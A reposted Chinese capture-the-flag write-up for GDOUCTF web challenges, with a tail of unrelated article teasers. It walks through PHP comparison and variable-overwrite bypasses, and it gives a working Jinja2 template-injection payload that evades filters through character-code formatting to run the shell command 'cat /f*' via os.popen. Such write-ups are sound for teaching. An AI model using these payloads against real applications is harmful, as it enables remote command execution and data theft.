GDOUCTF WEB

news2024/11/26 12:46:49

web

hate eat snake

游戏题找js,将判断语句删掉即可

image-20230416213331939

image-20230416213254806

ezweb

看源码找到/src路由,找到源码

import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()

用PUT方式访问/super-secret-route-nobody-will-guess路由即可

image-20230416212929564

受不了一点

源码

<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(!isset($_GET['flag']) && !isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $f1ag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?>

绕if语句

第一个:md5的强比较,数组可以绕过 gdou[]=1&ctf[]=2

第二个:传入Cookie:cookie=j0k3r即可

第三个:弱比较加个+即可:aaa=114514+&bbb=114514

第四个:只要flag不为空即可:post:flag=1 GET:flag=1

image-20230416213930067

EZ WEB

看一下框架

image-20230416211507392

flask,多半是ssti,测试一下

image-20230416212144048

image-20230416212158711

fuzz字典跑一下看到只有这些没有被过滤

image-20230416211919734

看报错是jinja2

image-20230416214104830

可以用jinja2的原生函数attr

我们要构造的是

{%print config|attr('__class__')|attr(__init__)|attr('__globals__')|attr('__getitem__')('o'+'s')|attr('popen')('cat /f*')|attr('read')()%}

但()里面的都被过滤了

可以用format,格式化字符串输出

例如

attr('%c%c%c%c%c%c%c%c%c'|format(95,95,99,108,97,115,115,95,95))

就等价与

attr('__class__')

所以就可以按照这个方法绕过

最终pyload

{%print config|attr('%c%c%c%c%c%c%c%c%c'|format(95,95,99,108,97,115,115,95,95))|attr('%c%c%c%c%c%c%c%c'|format(95,95,105,110,105,116,95,95))|attr('%c%c%c%c%c%c%c%c%c%c%c'|format(95,95,103,108,111,98,97,108,115,95,95))|attr('%c%c%c%c%c%c%c%c%c%c%c'|format(95,95,103,101,116,105,116,101,109,95,95))('o'+'s')|attr('%c%c%c%c%c'|format(112,111,112,101,110))('cat /f*')|attr('%c%c%c%c'|format(114,101,97,100))()%}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/423967.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

如何快速开发软件?这篇文章说明白了

如何快速开发软件?这篇文章说明白了

随着经济迅速发展&#xff0c;传统软件开发模式存在研发周期长、需求转化困难、投入成本高等问题&#xff0c;无法适应当前业务发展速度,市场需要快速开发工具。快速开发软件可分为代码生成类、少代码类、零代码功能配置类。代码生成类相对灵活&#xff0c;但对用户要求高&…
阅读更多...
MySQL group_concat设置group_concat_max_len

MySQL group_concat设置group_concat_max_len

GROUP_CONCAT函数用于将多个字符串连接成一个字符串&#xff0c;在拼接成字符串时就会存在拼接长度的问题&#xff0c;mysql 默认的拼接最大长度为1024 个字节&#xff0c;由于1024个字节会出现不够用的情况&#xff0c;所以有时需要去根据情况进行修改&#xff0c;方式如下。 …
阅读更多...
nginx启动、配置、测试(全网最全)

nginx启动、配置、测试(全网最全)

目录 一、要求 1.配置不同IP访问 2.配置不同端口访问 3.配置域名访问 二、前期准备 1.安装gcc g的依赖库 2.安装 pcre的依赖库 3.安装zlib的依赖库 4.安装openssl的依赖库 5.解压nginx的安装包 6.进入到解压的nginx安装目录里面 7.将nginx安装到/usr/local/下 8.编译 9.进入到…
阅读更多...
从 Python 中的字典列表中删除重复项

从 Python 中的字典列表中删除重复项

要从字典列表中删除重复项&#xff1a; 使用字典推导来遍历列表。使用每个 id 属性的值作为键&#xff0c;使用字典作为值。使用 dict.values() 方法只获取唯一的字典。使用 list() 类将结果转换为列表。 list_of_dictionaries [{id: 1, site: jiyik.com},{id: 2, site: goo…
阅读更多...
5G NR调制阶数与EVM关系以及对系统SNR要求分析

5G NR调制阶数与EVM关系以及对系统SNR要求分析

移动通信技术对数据传输速率要求越来越高。一种提高传输速率的思路是使用更高阶的QAM 调制方式&#xff0c;例如5G NR 的256QAM PDSCH&#xff0c;微波的1024QAM&#xff0c;2048QAM和4096QAM 调制。更高阶的QAM 调制方式对系统也提出了更高的要求。例如某个系统的EVM 测试结果…
阅读更多...
微服务+springcloud+springcloud alibaba学习笔记【Hystrix(豪猪哥)的使用】(6/9)

微服务+springcloud+springcloud alibaba学习笔记【Hystrix(豪猪哥)的使用】(6/9)

Hystrix&#xff08;豪猪哥&#xff09;的使用 6/91、Hystrix熔断器概述2、HyStrix重要概念3、hystrix案例3.1 新建模块 Cloud-provider-hystrix-payment80013.2 创建带降级的order模块 Cloud-comsumer-feign-hystrix-order803.3 配置服务降级:3.3.1 服务降级 Cloud-provider-h…
阅读更多...
企业做体系认证要警惕的8大问题,别再被不良认证机构忽悠啦!

企业做体系认证要警惕的8大问题,别再被不良认证机构忽悠啦!

企业资质认证要警惕这八大问题 企业资质真的很管用。我们都知道从事任何一个行业都需要准入证明&#xff0c;尤其是招投标企业&#xff0c;企业资质更是投标的准入门槛&#xff0c;并且在投标中还可以为企业加分。 有些资质如ISO三体系是企业必备的资质之一&#xff0c;也是常…
阅读更多...
麻了,不要再动不动就BeanUtil.copyProperties

麻了,不要再动不动就BeanUtil.copyProperties

前言 最近项目上要求升级一个工具包hutool的版本&#xff0c;以解决安全漏洞问题&#xff0c;这不升级还好&#xff0c;一升级反而捅出了更大的篓子&#xff0c;究竟是怎么回事呢&#xff1f; 事件回顾 我们项目原先使用的hutool版本是5.7.2&#xff0c;在代码中&#xff0c…
阅读更多...
Hudi集成Flink-写入方式

Hudi集成Flink-写入方式

文章目录一、CDC 入湖1.1、[开启binlog](https://blog.csdn.net/wuxintdrh/article/details/130142601)1.2、创建测试表1.2.1、创建mysql表1.2.2、将 binlog 日志 写入 kafka1、使用 mysql-cdc 监听 binlog2、kafka 作为 sink表3、写入sink 表1.2.3、将 kakfa 数据写入hudi1、k…
阅读更多...
ERTEC200P-2 PROFINET设备完全开发手册(4-2)

ERTEC200P-2 PROFINET设备完全开发手册(4-2)

4.2 XHIF接口实验 4.2.1写入单片机固件 首先按照下图连接设备 用JLINK 20Pin JTAG连接4 Pin SWD可以采用转接板 单片机的参考程序是用ST的CubeIDE生成的&#xff0c;目前的版本是1.7.0。打开安装后的CubeIDE&#xff0c;在菜单中选择“File->Import“ 选择“Existing Proj…
阅读更多...
企业信息化建设都包括哪些方面?

企业信息化建设都包括哪些方面?

随着大数据技术的发展&#xff0c;时代的发展要求企业转变管理模式、建立信息化管理机制&#xff0c;同时也是提高工作、管理效率&#xff0c;促进企业战略性发展的重要保障。 企业信息化是将信息技术应用于企业发展实践中的一个动态过程&#xff0c;即通过挖掘先进的管理理念…
阅读更多...
高可靠多层板制造服务再获认可!华秋荣获创想三维优秀质量奖

高可靠多层板制造服务再获认可!华秋荣获创想三维优秀质量奖

4月10日&#xff0c;创想三维2023年度战略供应商大会在惠州成功举办&#xff0c;高可靠多层板制造商华秋出席了本次活动并取得了《优秀质量奖》一奖项。 大会现场&#xff0c;创想三维董事长陈春指出公司的持续发展与供应链高质量的交付息息相关。作为创想三维主力PCB供应商&am…
阅读更多...
【亲测有效】更新了WIN11之后 右键无 新建WORD,PPT,EXCEL 选项 问题 解决方案

【亲测有效】更新了WIN11之后 右键无 新建WORD,PPT,EXCEL 选项 问题 解决方案

原本正常的正版系统&#xff0c;在昨天4月自动更新安装之后&#xff0c;发现右键找 不到新建文档了&#xff0c;word,ppt,excel都不见了。 看了网上大神的方法 Win11安装了Office右键没有新建Excel选项怎么办&#xff1f; - 知乎 可以解决一部分 官方解决方案&#xff0c;亲…
阅读更多...
李宏毅2021春季机器学习课程视频笔记14-Transformer

李宏毅2021春季机器学习课程视频笔记14-Transformer

Transformer Transformer实际上就是变形金刚&#xff0c;其与Bert实际类似。其实际上就是一个Sequence-to-Sequence的模型&#xff0c;其输出的长度并不是由人为指定&#xff0c;而是由机器自行确定。 Transformer的基本结构&#xff0c;如上图所示&#xff0c;主要由一个Encod…
阅读更多...
AS01/AS02/AS03 创建定制屏幕字段

AS01/AS02/AS03 创建定制屏幕字段

本文简介&#xff1a;在sap标准屏幕上&#xff0c;增加客户定制的屏幕字段。 操作步骤&#xff1a; 1、在创建资产卡片AS01时&#xff0c;界面需要输入客户定制的字段&#xff0c;如下图方框所示 2、查看增强点&#xff0c;事务码&#xff1a;SMOD AIST002 3、创建增强项目…
阅读更多...
M1 M2上能安装上Autocad 2024 Mac 中文版吗 autocad m1 m2版本有啦 终于支持Ventura 13x了

M1 M2上能安装上Autocad 2024 Mac 中文版吗 autocad m1 m2版本有啦 终于支持Ventura 13x了

AutoCAD是一款强大的工具&#xff0c;适合于各种领域的设计和绘图。它具有二维图形和三维建模功能、多种文件格式支持、自定义命令和样式、批处理和脚本等特点&#xff0c;可以帮助用户实现高质量的设计和建模。同时&#xff0c;还支持云端存储和共享&#xff0c;方便用户随时随…
阅读更多...
【Linux】-- 进程概念的引入

【Linux】-- 进程概念的引入

目录 硬件 冯诺依曼体系结构 冯诺依曼体系结构推导 重点概念 网络数据流向 软件 操作系统(Operator System - OS) 概念 定位 进程内核数据结构PCB&#xff08;task_struct&#xff09; 通过系统调用创建进程-fork初始 fork基本用法 使用if进行分流 查看运行效果 …
阅读更多...
Python每日一练(20230417)

Python每日一练(20230417)

目录 1. 最大间距 &#x1f31f;&#x1f31f;&#x1f31f; 2. Z 字形变换 &#x1f31f;&#x1f31f; 3. 买卖股票的最佳时机 II &#x1f31f;&#x1f31f; &#x1f31f; 每日一练刷题专栏 &#x1f31f; Golang每日一练 专栏 Python每日一练 专栏 C/C每日一练…
阅读更多...
通过Android Studio自制.9.png启动页图片 - uniapp启动界面设置Android启动图片设置

通过Android Studio自制.9.png启动页图片 - uniapp启动界面设置Android启动图片设置

效果图 实现步骤 下载安装JDK 参考Oracle官网&#xff1a; https://www.oracle.com/java/technologies/javase/upgrade.html 再跳转到JavaSE Upgrade下载页面&#xff1a;Java Downloads | Oracle 配置JDK&#xff1a; 假设jdk安装位置是D:\Program Files\Java\jdk-18.0.1.1 …
阅读更多...
CDH6.3.2大数据集群生产环境安装(八)之各组件参数调优,yarn参数调优,hdfs参数调优等

CDH6.3.2大数据集群生产环境安装(八)之各组件参数调优,yarn参数调优,hdfs参数调优等

yarn资源调优 主要涉及到了ResourceManager、NodeManager这几个概念,相关的优化也要紧紧围绕着这几方面来开展。这里还有一个Container的概念,现在可以先把它理解为运行map/reduce task的容器 28.1. 内存 堆栈等配置  原值  调优值
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023